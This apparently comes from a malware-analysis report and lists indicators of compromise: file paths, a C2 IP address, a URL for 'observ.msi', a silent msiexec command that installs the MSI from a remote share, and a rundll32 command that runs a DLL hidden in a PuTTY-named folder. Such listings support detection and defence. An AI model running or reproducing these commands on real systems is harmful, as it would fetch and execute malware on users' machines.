Technical Information
- '%WINDIR%\installer\msia113.tmp' C:/Windows/System32/rundll32.exe %LOCALAPPDATA%\Putty/setordinal.dll,bhuf
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\observ0.msi
- '45.##0.146.156':80
- http://45.##0.146.156/share/observ.msi
- '<SYSTEM32>\msiexec.exe' -i \\45.140.146.156@80\share\observ.msi -qn
- '<SYSTEM32>\rundll32.exe' %LOCALAPPDATA%\Putty/setordinal.dll,bhuf